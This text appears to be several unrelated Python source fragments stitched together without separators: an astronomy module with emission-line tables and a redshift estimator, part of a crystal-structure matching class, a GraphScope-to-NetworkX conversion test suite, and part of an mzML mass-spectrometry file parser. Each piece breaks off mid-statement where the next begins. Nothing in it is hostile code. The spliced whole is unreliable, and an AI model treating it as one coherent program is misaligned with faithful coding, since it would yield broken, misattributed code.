LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import astropy.units as u import collections.abc import datetime import glob import logging import numpy as np import os import re import shutil import warnings from astropy.io import fits as pyfits from astropy.table import Table, MaskedColumn, Column, vstack from functools import partial from numpy import ma from scipy.optimize import leastsq from ..obj import Cube, Image, Spectrum, vactoair, airtovac, plot_rgb from ..obj.objs import is_int, is_float, bounding_box from ..tools import MpdafWarning from ..MUSE import FieldsMap, FSFModel, MoffatModel2 from ..MUSE.PSF import MOFFAT1, create_psf_cube from ..sdetect.sea import (segmentation, findCentralDetection, union, intersection, compute_optimal_spectrum) __all__ = ('Source', 'SourceList', 'matchlines', 'crackz') emlines = {1215.67: 'LYALPHA1216', 1550.0: 'CIV1550', 1909.0: 'CIII]1909', 2326.0: 'CII2326', 2801.0: 'MgII2801', 3726.032: '[OII]3726', 3728.8149: '[OII]3729', 3798.6001: 'HTHETA3799', 3834.6599: 'HETA3835', 3869.0: '[NeIII]3869', 3888.7: 'HZETA3888', 3967.0: '[NeIII]3967', 4102.0: 'HDELTA4102', 4340.0: 'HGAMMA4340', 4861.3198: 'HBETA4861', 4959.0: '[OIII]4959', 5007.0: '[OIII]5007', 6548.0: '[NII]6548', 6562.7998: 'HALPHA6563', 6583.0: '[NII]6583', 6716.0: '[SII]6716', 6731.0: '[SII]6731'} STR_DTYPE = 'U20' TABLES_SCHEMA = { # Version of the source format, see SourceICD.pdf 'version': '0.6', 'MAG': { 'BAND': { 'description': 'Filter name', 'dtype': STR_DTYPE, 'primary_index': True }, 'MAG': { 'format': '.3f', 'description': 'AB Magnitude', 'unit': 'mag', 'dtype': 'f8' }, 'MAG_ERR': { 'format': '.3f', 'description': 'Error in AB Magnitude', 'unit': 'mag', 'dtype': 'f8' } }, 'Z': { 'Z': { 'description': 'Estimated redshift', 'format': '.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_MIN': { 'description': 'Lower bound of estimated redshift', 'format': '.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_MAX': { 'description': 'Upper bound of estimated redshift', 'format': '.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_DESC': { 'description': 'Type of redshift', 'dtype': STR_DTYPE, 'primary_index': True } } } def _set_table_attributes(name, table): for colname, attributes in TABLES_SCHEMA[name].items(): for attr, value in attributes.items(): if attr not in ('dtype', 'primary_index'): setattr(table[colname], attr, value) elif attr == 'primary_index': table.add_index(colname, unique=True) def _headercorrected(hdr): """Handle keywords that have been renamed.""" # COM*** -> COMMENT i = 1 while 'COM%03d' % i in hdr: value = hdr['COM%03d' % i] comment = hdr.cards['COM%03d' % i].comment hdr['COMMENT'] = '[%s] %s' % (comment, value) del hdr['COM%03d' % i] i += 1 # HIST*** -> HISTORY i = 1 while 'HIST%03d' % i in hdr: value = hdr['HIST%03d' % i] comment = hdr.cards['HIST%03d' % i].comment hdr['HISTORY'] = '%s (%s)' % (value, comment) del hdr['HIST%03d' % i] i += 1 # ORIGIN -> FROM if 'ORIGIN' in hdr.keys(): hdr.rename_keyword('ORIGIN', 'FROM') if 'ORIGIN_V' in hdr.keys(): hdr.rename_keyword('ORIGIN_V', 'FROM_V') # SOURCE_V -> FORMAT if 'SOURCE_V' in hdr.keys(): hdr.rename_keyword('SOURCE_V', 'FORMAT') # SRC_VERS -> SRC_V if 'SRC_VERS' in hdr.keys(): hdr.rename_keyword('SRC_VERS', 'SRC_V') def matchlines(nlines, wl, z, eml): """Try to match all the lines given. For each line computes the distance in Angstroms to the closest line. Add the errors Algorithm from <NAME> (<EMAIL>) Parameters ---------- nlines : int Number of emission lines wl : array of float Table of wavelengths z : float Redshift to test eml : dict Full catalog of lines to test redshift. key: wavelength, value: name. Returns ------- out : (array of float, array of float) (list of wavelengths, errors) """ lbdas = np.array(list(eml.keys())) a = (wl[:, np.newaxis] / (1 + z) - lbdas[np.newaxis, :]) ** 2.0 jfound = np.argmin(a, axis=1) error = np.diag(a[:, jfound]).sum() error = np.sqrt(error / nlines) if((nlines >= 2)and(jfound[0] == jfound[1])): error = 15. return(error, jfound) def crackz(nlines, wl, flux, eml, zguess=None): """Method to estimate the best redshift matching a list of emission lines. Algorithm from <NAME> (<EMAIL>) Parameters ---------- nlines : int Number of emission lines wl : array of float Table of observed line wavelengths flux : array of float Table of line fluxes eml : dict Full catalog of lines to test redshift zguess : float Guess redshift to test (only this) Returns ------- out : (float, float, int, list of float, list of float, list of str) (redshift, redshift error, list of wavelengths, list of fluxes, list of lines names) """ errmin = 3.0 found = 0 lnames = np.array(list(eml.values())) lbdas = np.array(list(eml.keys())) if(nlines == 0): return -9999.0, -9999.0, 0, [], [], [] if(nlines == 1): return -9999.0, -9999.0, 1, wl, flux, ["Lya/[OII]"] if zguess: (error, jfound) = matchlines(nlines, wl, zguess, eml) if(error < errmin): return zguess, -9999.0, 1, wl, flux, list(lnames[jfound[0]]) else: return zguess, -9999.0, 1, [], [], [] # test all redshift combinations for n in range(nlines): for p in range(lbdas.shape[0]): ztest = wl[n] / lbdas[p] - 1.0 if(ztest >= 0): (error, jfound) = matchlines(nlines, wl, ztest, eml) if(error < errmin): errmin = error found = 1 zfound = ztest jfinal = jfound.copy() if(found == 1): jfinal = np.array(jfinal).astype(int) return zfound, errmin / np.min(lbdas[jfinal]), nlines, \ wl, flux, list(lnames[jfinal[0:nlines]]) else: if(nlines > 3): # keep the three brightest ksel = np.argsort(flux)[-1:-4:-1] return crackz(3, wl[ksel], flux[ksel], eml) if(nlines == 3): # keep the two brightest ksel = np.argsort(flux)[-1:-3:-1] return crackz(2, wl[ksel], flux[ksel], eml) if(nlines == 2): # keep the brightest ksel = np.argsort(flux)[-1] return crackz(1, [wl[ksel]], [flux[ksel]], eml) return -9999.0, -9999.0, 0, [], [], [] def _mask_invalid(tables): tables = [tables] if isinstance(tables, Table) else tables for tab in tables: if tab is not None: for name, col in tab.columns.items(): try: tab[name] = ma.masked_invalid(col) tab[name] = ma.masked_equal(col, -9999) except Exception: pass def _read_ext(cls, hdulist, extname, **kwargs): """Read an extension from a FITS HDUList.""" try: if cls == Table: # use Table.read method to ensure extra header keywords are loaded # as metadata obj = Table.read(hdulist, hdu=extname) obj = Table(obj, **kwargs) else: obj = cls(hdulist[extname].data, **kwargs) except Exception as e: raise IOError('%s: Impossible to open extension %s as a %s\n%s' % ( os.path.basename(hdulist.filename()), extname, cls.__name__, e)) return obj def _read_mpdaf_obj(cls, hdulist, ext, **kwargs): """Read an extension from a FITS HDUList and return an MPDAF object.""" filename = hdulist.filename() try: obj = cls(filename=filename, hdulist=hdulist, ext=ext, **kwargs) except Exception as e: raise IOError('%s: Impossible to open extension %s as a %s\n%s' % ( os.path.basename(filename), ext, cls.__name__, e)) return obj def _read_table(hdulist, extname, **kwargs): """Read a masked Table from a FITS HDUList.""" t = _read_ext(Table, hdulist, extname, **kwargs) h = hdulist[extname].header for i in range(h['TFIELDS']): try: t.columns[i].unit = h['TUNIT%d' % (i + 1)] except Exception: pass return t def _remove_hdu(hdulist, name): try: del hdulist[name] except KeyError: pass def _insert_or_update_hdu(hdulist, name, hdu): try: idx = hdulist.index_of(name) hdulist[idx] = hdu except KeyError: hdulist.append(hdu) def _write_mpdaf_obj(obj, type_, name, hdulist): ext_name = '{}_{}_DATA'.format(type_, name) savemask = 'nan' if obj.data.dtype.kind == 'f' else 'dq' datahdu = obj.get_data_hdu(name=ext_name, savemask=savemask) _insert_or_update_hdu(hdulist, ext_name, datahdu) ext_name = '{}_{}_STAT'.format(type_, name) hdu = obj.get_stat_hdu(name=ext_name, header=datahdu.header) if hdu is not None: _insert_or_update_hdu(hdulist, ext_name, hdu) if savemask == 'dq': ext_name = '{}_{}_DQ'.format(type_, name) hdu = obj.get_dq_hdu(name=ext_name, header=datahdu.header) if hdu is not None: _insert_or_update_hdu(hdulist, ext_name, hdu) def _write_table(table, name, hdulist): if
and number of sites in cells differ after a primitive cell reduction (divisible by an integer) attempts to generate a supercell transformation of the smaller cell which is equivalent to the larger structure. allow_subset (bool): Allow one structure to match to the subset of another structure. Eg. Matching of an ordered structure onto a disordered one, or matching a delithiated to a lithiated structure. This option cannot be combined with attempt_supercell, or with structure grouping. comparator (Comparator): A comparator object implementing an equals method that declares declaring equivalency of sites. Default is SpeciesComparator, which implies rigid species mapping, i.e., Fe2+ only matches Fe2+ and not Fe3+. Other comparators are provided, e.g., ElementComparator which matches only the elements and not the species. The reason why a comparator object is used instead of supplying a comparison function is that it is not possible to pickle a function, which makes it otherwise difficult to use StructureMatcher with Python's multiprocessing. supercell_size (str): Method to use for determining the size of a supercell (if applicable). Possible values are num_sites, num_atoms, volume, or an element present in both structures. ignored_species (list): A list of ions to be ignored in matching. Useful for matching structures that have similar frameworks except for certain ions, e.g., Li-ion intercalation frameworks. This is more useful than allow_subset because it allows better control over what species are ignored in the matching. """ def __init__(self, ltol=0.2, stol=0.3, angle_tol=5, primitive_cell=True, scale=True, attempt_supercell=False, allow_subset=False, comparator=SpeciesComparator(), supercell_size='num_sites', ignored_species=None): self.ltol = ltol self.stol = stol self.angle_tol = angle_tol self._comparator = comparator self._primitive_cell = primitive_cell self._scale = scale self._supercell = attempt_supercell self._supercell_size = supercell_size self._subset = allow_subset self._ignored_species = [] if ignored_species is None else \ ignored_species[:] def _get_supercell_size(self, s1, s2): """ Returns the supercell size, and whether the supercell should be applied to s1. If fu == 1, s1_supercell is returned as true, to avoid ambiguity. """ if self._supercell_size == 'num_sites': fu = s2.num_sites / s1.num_sites elif self._supercell_size == 'num_atoms': fu = s2.composition.num_atoms / s1.composition.num_atoms elif self._supercell_size == 'volume': fu = s2.volume / s1.volume else: try: el = get_el_sp(self._supercell_size) fu = s2.composition[el] / s1.composition[el] except: raise ValueError('invalid argument for supercell_size') if fu < 2/3: return int(round(1/fu)), False else: return int(round(fu)), True def _get_lattices(self, target_lattice, s, supercell_size=1): """ Yields lattices for s with lengths and angles close to the lattice of target_s. If supercell_size is specified, the returned lattice will have that number of primitive cells in it Args: s, target_s: Structure objects """ lattices = s.lattice.find_all_mappings( target_lattice, ltol=self.ltol, atol=self.angle_tol, skip_rotation_matrix=True) for l, _, scale_m in lattices: if abs(abs(np.linalg.det(scale_m)) - supercell_size) < 0.5: yield l, scale_m def _get_supercells(self, struct1, struct2, fu, s1_supercell): """ Computes all supercells of one structure close to the lattice of the other if s1_supercell == True, it makes the supercells of struct1, otherwise it makes them of s2 yields: s1, s2, supercell_matrix, average_lattice, supercell_matrix """ def av_lat(l1, l2): params = (np.array(l1.lengths_and_angles) + np.array(l2.lengths_and_angles)) / 2 return Lattice.from_lengths_and_angles(*params) def sc_generator(s1, s2): s2_fc = np.array(s2.frac_coords) if fu == 1: cc = np.array(s1.cart_coords) for l, sc_m in self._get_lattices(s2.lattice, s1, fu): fc = l.get_fractional_coords(cc) fc -= np.floor(fc) yield fc, s2_fc, av_lat(l, s2.lattice), sc_m else: fc_init = np.array(s1.frac_coords) for l, sc_m in self._get_lattices(s2.lattice, s1, fu): fc = np.dot(fc_init, np.linalg.inv(sc_m)) lp = lattice_points_in_supercell(sc_m) fc = (fc[:, None, :] + lp[None, :, :]).reshape((-1, 3)) fc -= np.floor(fc) yield fc, s2_fc, av_lat(l, s2.lattice), sc_m if s1_supercell: for x in sc_generator(struct1, struct2): yield x else: for x in sc_generator(struct2, struct1): # reorder generator output so s1 is still first yield x[1], x[0], x[2], x[3] def _cmp_fstruct(self, s1, s2, frac_tol, mask): """ Returns true if a matching exists between s2 and s2 under frac_tol. s2 should be a subset of s1 """ if len(s2) > len(s1): raise ValueError("s1 must be larger than s2") if mask.shape != (len(s2), len(s1)): raise ValueError("mask has incorrect shape") return is_coord_subset_pbc(s2, s1, frac_tol, mask) def _cart_dists(self, s1, s2, avg_lattice, mask, normalization, lll_frac_tol=None): """ Finds a matching in cartesian space. Finds an additional fractional translation vector to minimize RMS distance Args: s1, s2: numpy arrays of fractional coordinates. len(s1) >= len(s2) avg_lattice: Lattice on which to calculate distances mask: numpy array of booleans. mask[i, j] = True indicates that s2[i] cannot be matched to s1[j] normalization (float): inverse normalization length Returns: Distances from s2 to s1, normalized by (V/Natom) ^ 1/3 Fractional translation vector to apply to s2. Mapping from s1 to s2, i.e. with numpy slicing, s1[mapping] => s2 """ if len(s2) > len(s1): raise ValueError("s1 must be larger than s2") if mask.shape != (len(s2), len(s1)): raise ValueError("mask has incorrect shape") # vectors are from s2 to s1 vecs, d_2 = pbc_shortest_vectors(avg_lattice, s2, s1, mask, return_d2=True, lll_frac_tol=lll_frac_tol) lin = LinearAssignment(d_2) s = lin.solution short_vecs = vecs[np.arange(len(s)), s] translation = np.average(short_vecs, axis=0) f_translation = avg_lattice.get_fractional_coords(translation) new_d2 = np.sum((short_vecs - translation) ** 2, axis=-1) return new_d2 ** 0.5 * normalization, f_translation, s def _get_mask(self, struct1, struct2, fu, s1_supercell): """ Returns mask for matching struct2 to struct1. If struct1 has sites a b c, and fu = 2, assumes supercells of struct2 will be ordered aabbcc (rather than abcabc) Returns: mask, struct1 translation indices, struct2 translation index """ mask = np.zeros((len(struct2), len(struct1), fu), dtype=np.bool) inner = [] for sp2, i in itertools.groupby(enumerate(struct2.species_and_occu), key=lambda x: x[1]): i = list(i) inner.append((sp2, slice(i[0][0], i[-1][0]+1))) for sp1, j in itertools.groupby(enumerate(struct1.species_and_occu), key=lambda x: x[1]): j = list(j) j = slice(j[0][0], j[-1][0]+1) for sp2, i in inner: mask[i, j, :] = not self._comparator.are_equal(sp1, sp2) if s1_supercell: mask = mask.reshape((len(struct2), -1)) else: # supercell is of struct2, roll fu axis back to preserve # correct ordering mask = np.rollaxis(mask, 2, 1) mask = mask.reshape((-1, len(struct1))) # find the best translation indices i = np.argmax(np.sum(mask, axis=-1)) inds = np.where(np.invert(mask[i]))[0] if s1_supercell: # remove the symmetrically equivalent s1 indices inds = inds[::fu] return np.array(mask, dtype=np.int_), inds, i def fit(self, struct1, struct2): """ Fit two structures. Args: struct1 (Structure): 1st structure struct2 (Structure): 2nd structure Returns: True or False. """ struct1, struct2 = self._process_species([struct1, struct2]) if not self._subset and self._comparator.get_hash(struct1.composition) \ != self._comparator.get_hash(struct2.composition): return None struct1, struct2, fu, s1_supercell = self._preprocess(struct1, struct2) match = self._match(struct1, struct2, fu, s1_supercell, break_on_match=True) if match is None: return False else: return match[0] <= self.stol def get_rms_dist(self, struct1, struct2): """ Calculate RMS displacement between two structures Args: struct1 (Structure): 1st structure struct2 (Structure): 2nd structure Returns: rms displacement normalized by (Vol / nsites) ** (1/3) and maximum distance between paired sites. If no matching lattice is found None is returned. """ struct1, struct2 = self._process_species([struct1, struct2]) struct1, struct2, fu, s1_supercell = self._preprocess(struct1, struct2) match = self._match(struct1, struct2, fu, s1_supercell, use_rms=True, break_on_match=False) if match is None: return None else: return match[0], max(match[1]) def _process_species(self, structures): copied_structures = [] for s in structures: # We need the copies to be actual Structure to work properly, not # subclasses. So do type(s) == Structure. ss = s.copy() if type(s) == Structure else \ Structure.from_sites(s) if self._ignored_species: ss.remove_species(self._ignored_species) copied_structures.append(ss) return copied_structures def _preprocess(self, struct1, struct2, niggli=True): """ Rescales, finds the reduced structures (primitive and niggli), and finds fu, the supercell size to make struct1 comparable to s2 """ struct1 = struct1.copy() struct2 = struct2.copy() if niggli: struct1 = struct1.get_reduced_structure(reduction_algo="niggli") struct2 = struct2.get_reduced_structure(reduction_algo="niggli") # primitive cell transformation if self._primitive_cell: struct1 = struct1.get_primitive_structure() struct2 = struct2.get_primitive_structure() if self._supercell: fu, s1_supercell = self._get_supercell_size(struct1, struct2) else: fu, s1_supercell = 1, True mult = fu if s1_supercell else 1/fu # rescale lattice to same volume if self._scale: ratio = (struct2.volume / (struct1.volume * mult)) ** (1 / 6) nl1 = Lattice(struct1.lattice.matrix * ratio) struct1.modify_lattice(nl1) nl2 = Lattice(struct2.lattice.matrix / ratio) struct2.modify_lattice(nl2) return struct1, struct2, fu, s1_supercell def _match(self, struct1, struct2, fu, s1_supercell=True, use_rms=False, break_on_match=False): """ Matches one struct onto the other """ ratio = fu if s1_supercell else 1/fu if len(struct1) * ratio >= len(struct2): return self._strict_match( struct1,
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import pytest from networkx.exception import NetworkXError import graphscope import graphscope.nx as nx from graphscope.client.session import g from graphscope.client.session import get_default_session from graphscope.framework.errors import InvalidArgumentError from graphscope.framework.loader import Loader from graphscope.proto import graph_def_pb2 def ldbc_sample_single_label(prefix, directed): graph = graphscope.g(directed=directed, generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_string_oid(prefix, directed): graph = graphscope.g(directed=directed, oid_type="string", generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_single_label_with_sess(sess, prefix, directed): graph = sess.g(directed=directed, generate_eid=False) graph = graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment" ) graph = graph.add_edges( Loader(os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|"), "replyOf", ) return graph def ldbc_sample_multi_labels(prefix, directed): graph = graphscope.g(directed=directed, generate_eid=False) graph = ( graph.add_vertices( Loader(os.path.join(prefix, "comment_0_0.csv"), delimiter="|"), "comment", ["creationDate", "locationIP", "browserUsed", "content", "length"], ) .add_vertices( Loader(os.path.join(prefix, "person_0_0.csv"), delimiter="|"), "person", [ "firstName", "lastName", "gender", ("birthday", str), "creationDate", "locationIP", "browserUsed", ], ) .add_vertices( Loader(os.path.join(prefix, "post_0_0.csv"), delimiter="|"), "post", [ "imageFile", "creationDate", "locationIP", "browserUsed", "language", "content", "length", ], ) ) graph = ( graph.add_edges( Loader( os.path.join(prefix, "comment_replyOf_comment_0_0.csv"), delimiter="|" ), "replyOf", src_label="comment", dst_label="comment", ) .add_edges( Loader(os.path.join(prefix, "person_knows_person_0_0.csv"), delimiter="|"), "knows", ["creationDate"], src_label="person", dst_label="person", ) .add_edges( Loader(os.path.join(prefix, "comment_replyOf_post_0_0.csv"), delimiter="|"), "replyOf2", src_label="comment", dst_label="post", ) ) return graph def load_p2p(prefix, directed): graph = graphscope.load_from( edges={ "group": { "loader": Loader( os.path.join(prefix, "p2p-31.e"), header_row=False, delimiter=" " ) } }, directed=directed, generate_eid=False, ) return graph @pytest.mark.usefixtures("graphscope_session") class TestGraphTransformation(object): @classmethod def setup_class(cls): cls.NXGraph = nx.Graph cls.data_dir = os.path.expandvars("${GS_TEST_DIR}/ldbc_sample") cls.single_label_g = ldbc_sample_single_label(cls.data_dir, False) cls.multi_label_g = ldbc_sample_multi_labels(cls.data_dir, False) cls.p2p = load_p2p(os.path.expandvars("${GS_TEST_DIR}"), False) cls.p2p_nx = nx.read_edgelist( os.path.expandvars("${GS_TEST_DIR}/dynamic/p2p-31_dynamic.edgelist"), nodetype=int, data=True, ) cls.str_oid_g = ldbc_sample_string_oid(cls.data_dir, False) @classmethod def teardown_class(cls): cls.single_label_g.unload() cls.multi_label_g.unload() cls.str_oid_g.unload() def assert_convert_success(self, gs_g, nx_g): assert gs_g.is_directed() == nx_g.is_directed() assert self._schema_equal(gs_g.schema, nx_g.schema) def _schema_equal(self, gs_schema, nx_schema): v_props = {} for entry in gs_schema._valid_vertex_labels(): for prop in entry.properties: v_props[prop.name] = prop.type e_props = {} for entry in gs_schema._valid_edge_labels(): for prop in entry.properties: e_props[prop.name] = prop.type gs_v_props = { prop.name: prop.type for prop in list(nx_schema._valid_vertex_labels())[0].properties } gs_e_props = { prop.name: prop.type for prop in list(nx_schema._valid_edge_labels())[0].properties } return v_props == gs_v_props and e_props == gs_e_props # nx to gs def test_empty_nx_to_gs(self): empty_nx_g = self.NXGraph(dist=True) gs_g = g(empty_nx_g) self.assert_convert_success(gs_g, empty_nx_g) def test_only_contains_nodes_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(100), type="node") gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_simple_nx_to_gs(self): nx_g = nx.complete_graph(10, create_using=self.NXGraph) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_int_node_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(10), foo="star") nx_g.add_edges_from( [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, 6), (6, 7), (7, 8), (8, 9)], weight=3.14, ) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_str_node_nx_to_gs(self): nx_g = nx.les_miserables_graph() gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_complete_nx_to_gs(self): # multi-propery, node propery and edge propty both aligned nodes = [ (0, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (1, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (2, {"vp1": 1, "vp2": "v", "vp3": 3.14}), ] edges = [ (0, 1, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (0, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (1, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), ] nx_g = self.NXGraph(dist=True) nx_g.update(edges, nodes) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # node property aliged, edge not aliged nx_g2 = nx_g.copy() nx_g2.add_edge(0, 1, ep4="new propery") gs_g2 = g(nx_g2) self.assert_convert_success(gs_g2, nx_g2) # edge property aliged, node not aliged nx_g3 = nx_g.copy() nx_g3.add_node(2, vp4="new propery") gs_g3 = g(nx_g3) self.assert_convert_success(gs_g3, nx_g3) # both not aliged nx_g4 = nx_g.copy() nx_g4.add_edge(0, 1, ep4="new propery") nx_g4.add_node(2, vp4="new propery") gs_g4 = g(nx_g4) self.assert_convert_success(gs_g4, nx_g4) def test_nx_to_gs_after_modify(self): nx_g = self.NXGraph(dist=True) nodes = [ (0, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (1, {"vp1": 1, "vp2": "v", "vp3": 3.14}), (2, {"vp1": 1, "vp2": "v", "vp3": 3.14}), ] # add nodes nx_g.add_nodes_from(nodes) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # add_edges edges = [ (0, 1, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (0, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), (1, 2, {"ep1": 1, "ep2": "e", "ep3": 3.14}), ] nx_g.add_edges_from(edges) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # remove edge nx_g.remove_edge(0, 1) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # remove node nx_g.remove_node(0) gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # clear nx_g.clear() gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) def test_nx_to_gs_remove_nodes(self): nx_g = self.NXGraph(dist=True) nx_g.add_nodes_from(range(10)) # all nodes are int gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # success nx_g.add_node("str_node") # add a str node with pytest.raises( RuntimeError, match="The vertex type is not consistent <class 'int'> vs <class 'str'>, can not convert it to arrow graph", ): gs_g = g(nx_g) # mixing oid type, failed nx_g.remove_node("str_node") # remove str node, all nodes are int again gs_g = g(nx_g) self.assert_convert_success(gs_g, nx_g) # success def test_error_on_view_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g._graph = None # graph view always has a _graph attribute nx_g._is_client_view = False with pytest.raises(TypeError, match="graph view can not convert to gs graph"): gs_g = g(nx_g) def test_error_on_mixing_node_nx_to_gs(self): nx_g = self.NXGraph(dist=True) nx_g.add_node(0, weight=1.23) nx_g.add_node("zakky", foo="node") with pytest.raises( RuntimeError, match="The vertex type is not consistent <class 'int'> vs <class 'str'>, can not convert it to arrow graph", ): gs_g = g(nx_g) # gs to nx def test_empty_gs_to_nx(self): empty_nx = self.NXGraph(dist=True) empty_gs_graph = g(empty_nx) G = self.NXGraph(empty_gs_graph) self.assert_convert_success(empty_gs_graph, G) def test_single_label_gs_to_nx(self): G = self.NXGraph(self.single_label_g) assert G.number_of_nodes() == 76830 assert G.number_of_edges() == 38786 assert 618475290625 not in G assert ("comment", 618475290625) in G G2 = self.NXGraph(self.single_label_g, default_label="comment") assert G2.number_of_nodes() == 76830 assert G2.number_of_edges() == 38786 assert 618475290625 in G2 assert ("comment", 618475290625) not in G2 def test_multi_label_gs_to_nx(self): G = self.NXGraph(self.multi_label_g) assert G.number_of_nodes() == (76830 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) assert 618475290625 not in G # comment node is (label, id) format assert ("comment", 618475290625) in G assert 933 not in G # person node is (label, id) format assert ("person", 933) in G assert 618475290624 not in G # post node is (label, id) format assert ("post", 618475290624) in G G2 = self.NXGraph(self.multi_label_g, default_label="comment") assert G2.number_of_nodes() == (76830 + 903 + 78976) assert G2.number_of_edges() == (38786 + 6626 + 38044) assert 618475290625 in G2 # comment node is default label node assert ("comment", 618475290625) not in G2 assert 933 not in G2 # person node is (label, id) format assert ("person", 933) in G2 assert 618475290624 not in G2 # post node is (label, id) format assert ("post", 618475290624) in G @pytest.mark.skipif( os.environ.get("DEPLOYMENT", None) == "standalone", reason="FIXME(weibin): ci runner failed", ) def test_report_methods_on_copy_on_write_strategy(self): G = self.NXGraph(self.multi_label_g, default_label="person") assert G.graph_type == graph_def_pb2.ARROW_PROPERTY # test NODE_NUM and EDGE_NUM assert G.number_of_nodes() == (76830 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) # test HAS_NODE and HAS_EDGE assert 0 not in G assert 933 in G assert ("person", 933) not in G # deault node must be non-tuple format assert ("random", 933) not in G assert G.has_edge(933, 4398046511628) assert G.has_edge(("comment", 618475290625), ("post", 618475290624)) assert not G.has_edge(933, ("post", 618475290624)) # test GET_NODE_DATA and GET_EDGE_DATA assert G.get_node_data(933) == { "browserUsed": "Firefox", "locationIP": "172.16.58.3", "creationDate": "2010-02-14T15:32:10.447+0000", "birthday": "1989-12-03", "gender": "male", "lastName": "Perera", "firstName": "Mahinda", } assert G.get_edge_data(933, 4398046511628) == { "creationDate": "2010-07-30T15:19:53.298+0000", } assert sorted(list(G.neighbors(933))) == [ 4398046511628, 8796093023017, 28587302322537, ] if G.is_directed(): assert sorted(list(G.predecessors(4398046511628))) == [ 318, 933, 987, 2199023256530, ] G.add_node(0) # modify graph to make copy on write assert G.graph_type == graph_def_pb2.DYNAMIC_PROPERTY assert G.number_of_nodes() == (76831 + 903 + 78976) assert G.number_of_edges() == (38786 + 6626 + 38044) # test HAS_NODE and HAS_EDGE assert 0 in G assert 933 in G assert ("person", 933) not in G assert ("random", 933) not in G assert G.has_edge(933, 4398046511628) assert G.has_edge(("comment", 618475290625), ("post", 618475290624)) assert not G.has_edge(618475290625, ("post", 618475290624)) # test GET_NODE_DATA and GET_EDGE_DATA assert G.get_node_data(933) == { "browserUsed": "Firefox", "locationIP":
'SRM spectrum', } othertypes = { # other accession keys (non-MS) 'MS:1000620': 'PDA spectrum', 'MS:1000804': 'electromagnetic radiation spectrum', 'MS:1000805': 'emission spectrum', 'MS:1000806': 'absorption spectrum', } out = {} if isinstance(hand, CVParameterSet): # handed a cvparam class object (expected) p = hand else: # handed a tree or branch (generate the cvparam class object) p = CVParameterSet(hand) for acc in p.keys() & mstypes.keys(): # check for ms spectrum out['acc'] = acc # accession code out['name'] = mstypes[acc] # name of spectrum out['type'] = 'MS' # it is a mass spectrum out['level'] = p['MS:1000511'].value # ms level out['window'] = [p['MS:1000501'].value, p['MS:1000500'].value] # scan window if 'MS:1000129' in p: # negative scan out['mode'] = '-' elif 'MS:1000130' in p: # positive scan out['mode'] = '+' if 'MS:1000827' in p: # if there is an isolation window target m/z out['target'] = p['MS:1000827'].value # if MSn > 2, not sure how to handle this (will have to be hard coded later as I have no examples) elif out['level'] > 2: raise ValueError( 'This script has not been coded to handle MSn > 2, please contact the author of the class') return out for acc in p.keys() & othertypes.keys(): # if the scan is something else out['acc'] = acc # accession code out['name'] = othertypes[acc] # name of spectrum if 'MS:1000804' in p: # if it is a UV-Vis out['type'] = 'UV' else: # other other type (not handled by script) raise KeyError( 'The script has not been coded to handle spectra types other than MS and UV-Vis. ' 'Please contact the authors to get this functionality included.') return out class mzML(object): def __init__(self, filename: str, verbose: bool = True, precision: int = 64, compression: bool = True, gzip_file: bool = True, obo: str = None, ftt: bool = False, **kwargs ): """ A class for loading and extracting data from an mzML file. :param str filename: The name of the mzML or mass spectrometric data file. Accepted file types are listed below, and 